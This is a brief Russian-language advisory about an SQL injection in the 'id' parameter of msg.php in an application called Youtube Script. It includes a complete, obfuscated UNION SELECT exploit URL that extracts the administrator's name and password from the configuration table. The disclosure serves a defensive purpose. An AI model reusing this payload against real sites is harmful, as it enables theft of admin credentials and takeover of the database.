Программа: Youtube Script

Уязвимость в Youtube Script позволяет удаленному нападающему выполнить произвольные SQL-команды в базе данных приложения. Параметр "id", передающийся к файлу msg.php не проверяется на наличие команд, в результате взломщик может выполнить произвольный SQL-код.

Пример:

http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/* */SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765, convert(concat((SELECT/**/svalue/**/from/**/sconfig/* */where/**/soption= 0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/* */from/**/sconfig/**/where/**/soption= 0x61646D696E5F70617373))/**/using/**/latin1), 4,5,6,7,8,9/*



Оставить мнение